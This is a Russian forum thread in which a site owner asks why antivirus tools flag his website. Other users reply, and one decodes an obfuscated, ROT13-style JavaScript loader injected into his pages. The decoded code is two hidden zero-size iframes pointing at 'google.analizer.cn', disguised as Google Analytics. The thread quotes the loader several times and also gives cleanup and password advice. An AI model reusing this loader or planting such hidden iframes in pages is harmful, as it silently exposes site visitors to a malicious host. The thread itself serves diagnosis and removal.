Помогите плз - Где Вирус на сайте и как его удалить ?

[NoNaMe_909]

На сайте sl600.ru - у половины юзеров находится вирус, причём у одного знакомого НОД32 при открытии сайта закрыл ИЕ нафиг ....

У меня НОД32 с обновами молчит, открывал через Оперу, Мозиллу и ИЕ, Каспервкий с другого компа тоже молчит, а у некоторых отображается вирус ...

Вирус и раньше находился другими юзверями, но думал проблема в шабе, шаб поменял, проблема осталась, мож он на сервак попал ?
Как решить проблему ?

p.s заранее спасибо!

 

[Kaimi]

Вот

<SCRIPT>var h4gU='';var iPI9xSxEXHYABrgdD='z0cbvuS2v23%o2sRn%3ta%18q2r2b%3ee%/yy3Q%%s32zv3gbrc%2%2u0r%32%Q%rpk32u%t2e0%3r2Naeab232v2r2/%P2ut.qh12Qg2e2%%%e2n/cg4j2Q%qevn3pg.v.260%%0nQPrsf/nmr12g00%z%R0';var krUdSZLGlzdWzp='4863921057509781342676830415291306248957209356417856948307120567342189379816524026870194356870925143931542680706189427532489501673732895641024396185701728640539';var d='';for(var FEING481CaXRdOE23aSbNktV=0;FEING481CaXRdOE23aSbNktV<16;FEING481CaXRdOE23aSbNktV++) for(var znbEsrCBXKAwXtrzym6HSiDI5v6=0;znbEsrCBXKAwXtrzym6HSiDI5v6<10;znbEsrCBXKAwXtrzym6HSiDI5v6++) {d=iPI9xSxEXHYABrgdD.charCodeAt((parseInt(krUdSZLGlzdWzp.charAt(FEING481CaXRdOE23aSbNktV*10+znbEsrCBXKAwXtrzym6HSiDI5v6))*16)+FEING481CaXRdOE23aSbNktV); if ((d>=65 && d<78) || (d>=97 && d<110)) d+=13; else if ((d>=78 && d<91) || (d>=110 && d<123)) d-=13;h4gU+=String.fromCharCode(d);}document.write(unescape(h4gU));</SCRIPT><!-- c --><!-- o --><SCRIPT>var h4gU='';var iPI9xSxEXHYABrgdD='z0cbvuS2v23%o2sRn%3ta%18q2r2b%3ee%/yy3Q%%s32zv3gbrc%2%2u0r%32%Q%rpk32u%t2e0%3r2Naeab232v2r2/%P2ut.qh12Qg2e2%%%e2n/cg4j2Q%qevn3pg.v.260%%0nQPrsf/nmr12g00%z%R0';var krUdSZLGlzdWzp='4863921057509781342676830415291306248957209356417856948307120567342189379816524026870194356870925143931542680706189427532489501673732895641024396185701728640539';var d='';for(var FEING481CaXRdOE23aSbNktV=0;FEING481CaXRdOE23aSbNktV<16;FEING481CaXRdOE23aSbNktV++) for(var znbEsrCBXKAwXtrzym6HSiDI5v6=0;znbEsrCBXKAwXtrzym6HSiDI5v6<10;znbEsrCBXKAwXtrzym6HSiDI5v6++) {d=iPI9xSxEXHYABrgdD.charCodeAt((parseInt(krUdSZLGlzdWzp.charAt(FEING481CaXRdOE23aSbNktV*10+znbEsrCBXKAwXtrzym6HSiDI5v6))*16)+FEING481CaXRdOE23aSbNktV); if ((d>=65 && d<78) || (d>=97 && d<110)) d+=13; else if ((d>=78 && d<91) || (d>=110 && d<123)) d-=13;h4gU+=String.fromCharCode(d);}document.write(unescape(h4gU));</SCRIPT><!-- c --><SCRIPT>var kwyurHiR1NrMxo8yB='';var H0fcKDrfD2kR6um30jw3='e23n.ub502u%e2/z3%gr/3g52%t0e%s3P3/trr%6q2%2s%v%zp%tv%1%g%02n23eveube.10u23%q%R%%0gbpkS4%2r2z0Pn%Q2.vch230g2re32sf/aaqQ6j2v2o32rn%Nnmc22vІ%Rr2cyya32%QQ%rQ%0';var ihYH31AGhLyKfgZBHU34Okz='5124708396957438261064159308723542916870938240571697254608315061297483751094238691078234569102685734385710624946310579282035678149647913052878649350213507218469';var d='';for(var ctVDwuBRaG8=0;ctVDwuBRaG8<16;ctVDwuBRaG8++) for(var UwtHn=0;UwtHn<10;UwtHn++) {d=H0fcKDrfD2kR6um30jw3.charCodeAt((parseInt(ihYH31AGhLyKfgZBHU34Okz.charAt(ctVDwuBRaG8*10+UwtHn))*16)+ctVDwuBRaG8); if ((d>=65 && d<78) || (d>=97 && d<110)) d+=13; else if ((d>=78 && d<91) || (d>=110 && d<123)) d-=13;kwyurHiR1NrMxo8yB+=String.fromCharCode(d);}document.write(unescape(kwyurHiR1NrMxo8yB));</SCRIPT>

А если расшифровать, то у тебя там стоят два фрейма

<iframe src="http://google.analizer.cn/index.php?out=1212426812" width="0" height="0" frameborder="0"></iframe>
<iframe src="http://google.analizer.cn/index.php?out=1216455206" width="0" height="0" frameborder="0"></iframe>

 

[NoNaMe_909]

Вот

<SCRIPT>var h4gU='';var iPI9xSxEXHYABrgdD='z0cbvuS2v23%o2sRn%3ta%18q2r2b%3ee%/yy3Q%%s32zv3gbrc%2%2u0r%32%Q%rpk32u%t2e0%3r2Naeab232v2r2/%P2ut.qh12Qg2e2%%%e2n/cg4j2Q%qevn3pg.v.260%%0nQPrsf/nmr12g00%z%R0';var krUdSZLGlzdWzp='4863921057509781342676830415291306248957209356417856948307120567342189379816524026870194356870925143931542680706189427532489501673732895641024396185701728640539';var d='';for(var FEING481CaXRdOE23aSbNktV=0;FEING481CaXRdOE23aSbNktV<16;FEING481CaXRdOE23aSbNktV++) for(var znbEsrCBXKAwXtrzym6HSiDI5v6=0;znbEsrCBXKAwXtrzym6HSiDI5v6<10;znbEsrCBXKAwXtrzym6HSiDI5v6++) {d=iPI9xSxEXHYABrgdD.charCodeAt((parseInt(krUdSZLGlzdWzp.charAt(FEING481CaXRdOE23aSbNktV*10+znbEsrCBXKAwXtrzym6HSiDI5v6))*16)+FEING481CaXRdOE23aSbNktV); if ((d>=65 && d<78) || (d>=97 && d<110)) d+=13; else if ((d>=78 && d<91) || (d>=110 && d<123)) d-=13;h4gU+=String.fromCharCode(d);}document.write(unescape(h4gU));</SCRIPT><!-- c --><!-- o --><SCRIPT>var h4gU='';var iPI9xSxEXHYABrgdD='z0cbvuS2v23%o2sRn%3ta%18q2r2b%3ee%/yy3Q%%s32zv3gbrc%2%2u0r%32%Q%rpk32u%t2e0%3r2Naeab232v2r2/%P2ut.qh12Qg2e2%%%e2n/cg4j2Q%qevn3pg.v.260%%0nQPrsf/nmr12g00%z%R0';var krUdSZLGlzdWzp='4863921057509781342676830415291306248957209356417856948307120567342189379816524026870194356870925143931542680706189427532489501673732895641024396185701728640539';var d='';for(var FEING481CaXRdOE23aSbNktV=0;FEING481CaXRdOE23aSbNktV<16;FEING481CaXRdOE23aSbNktV++) for(var znbEsrCBXKAwXtrzym6HSiDI5v6=0;znbEsrCBXKAwXtrzym6HSiDI5v6<10;znbEsrCBXKAwXtrzym6HSiDI5v6++) {d=iPI9xSxEXHYABrgdD.charCodeAt((parseInt(krUdSZLGlzdWzp.charAt(FEING481CaXRdOE23aSbNktV*10+znbEsrCBXKAwXtrzym6HSiDI5v6))*16)+FEING481CaXRdOE23aSbNktV); if ((d>=65 && d<78) || (d>=97 && d<110)) d+=13; else if ((d>=78 && d<91) || (d>=110 && d<123)) d-=13;h4gU+=String.fromCharCode(d);}document.write(unescape(h4gU));</SCRIPT><!-- c --><SCRIPT>var kwyurHiR1NrMxo8yB='';var H0fcKDrfD2kR6um30jw3='e23n.ub502u%e2/z3%gr/3g52%t0e%s3P3/trr%6q2%2s%v%zp%tv%1%g%02n23eveube.10u23%q%R%%0gbpkS4%2r2z0Pn%Q2.vch230g2re32sf/aaqQ6j2v2o32rn%Nnmc22vІ%Rr2cyya32%QQ%rQ%0';var ihYH31AGhLyKfgZBHU34Okz='5124708396957438261064159308723542916870938240571697254608315061297483751094238691078234569102685734385710624946310579282035678149647913052878649350213507218469';var d='';for(var ctVDwuBRaG8=0;ctVDwuBRaG8<16;ctVDwuBRaG8++) for(var UwtHn=0;UwtHn<10;UwtHn++) {d=H0fcKDrfD2kR6um30jw3.charCodeAt((parseInt(ihYH31AGhLyKfgZBHU34Okz.charAt(ctVDwuBRaG8*10+UwtHn))*16)+ctVDwuBRaG8); if ((d>=65 && d<78) || (d>=97 && d<110)) d+=13; else if ((d>=78 && d<91) || (d>=110 && d<123)) d-=13;kwyurHiR1NrMxo8yB+=String.fromCharCode(d);}document.write(unescape(kwyurHiR1NrMxo8yB));</SCRIPT>

А если расшифровать, то у тебя там стоят два фрейма

Дык, ну это же Гугл Аналитикс ...

как нод32 может его с виром попутать ?

 

[Kaimi]

Гугл аналитикс в домене cn ?)

 

[LZet]

Есть подобные траблы...

Одно время была подобная трабла - с постоянством в 2-3 дня появлялась такая же ерунда. Заменялись все файлы index.*** на подобную муру.

Потом как-то вроде пропало. Штурмовал нодом с последними обновами. Ничего серьезного не нашел, кроме как пары хактулз (вот теперь думаю....). Но нашествия прекратились.

Как вообще от подобных "внедрений" защититься? Подскажите плиз...

И если можно, то хотя бы кратенько обрисуйте принципы атаки и, желательно, чуть подробней защиты...

Спасибо!

 

[NoNaMe_909]

Гугл аналитикс в домене cn ?)

Какой cn ?

Сайт на sl600.ru

 

[A6opureH]

а гугл аналиткс на cn

Для просмотра ссылки Войди или Зарегистрируйся.cn/index.php?out=1212426812

 

[RxB]

Какой cn ?
Сайт на sl600.ru

Да хоть на pp.net.com.edu.
По порядку:
1. На твоём сайте на станицах прописан iframe код, который замаскирован под код Google Analitics, Google Analitics врядли будет по адресу google.analizer.cn, да ещё и в шифрованном фрейме.
P.S. Ты его ставил?
2. Как защитится. Универсального способа защиты нет, потому что путей проникновения заразы два:
1. С сервера. То есть через дырявые скрипты залили шел и теперь ifram-ят тебя. Меры борьбы - писать или использовать нормальные не дырявые скрипты.
2. Удалённый. Скорее всего ты подцепил где-то трояна, который спёр у тебя сохранный в ftp - клиенте пароль, хотя не исключено что он мог его перехватить в момент залогинивания на ftp. Меры борьбы - поставить нормальный антивирус и фаервол, обязательно сменить настройки по умолчанию на более жестокие. В идеале поставить линукс и с него работать с сайтом.
3. Как бороться.
1. Проверить свой компьютер на вирусы, лучше даже несколькими антивирусами, например cureit-ом и авирой.
2. Сменить пароль на фтп и почистить код индексных страниц на сайте от

<SCRIPT>var h4gU='';var iPI9xSxEXHYABrgdD='z0cbvuS2v23%o2sRn%3ta%18q2r2b%3ee%/yy3Q%%s32zv3gbrc%2%2u0r%32%Q%rpk32u%t2e0%3r2Naeab232v2r2/%P2ut.qh12Qg2e2%%%e2n/cg4j2Q%qevn3pg.v.260%%0nQPrsf/nmr12g00%z%R0';var krUdSZLGlzdWzp='486392105750

3. Чтобы этого не повторилось поставить себе линукс и\или работать с виртуальной машины с сайтом, виртуальную машину использовать ТОЛЬКО для работы с сайтом
4. Никогда не сохранять пароли и постоянно их менять

 

[elchegevara]

Kaimi правду говорит, не зря же он столько рипов сделал )
1.Удаляй код
2.Меняй пароли
3.Меняй антивирус

 

[cds]

3-е лишнее. Достаточно переустановить со свежево дистра

Для просмотра ссылки Войди или Зарегистрируйся

Улыбнуло =)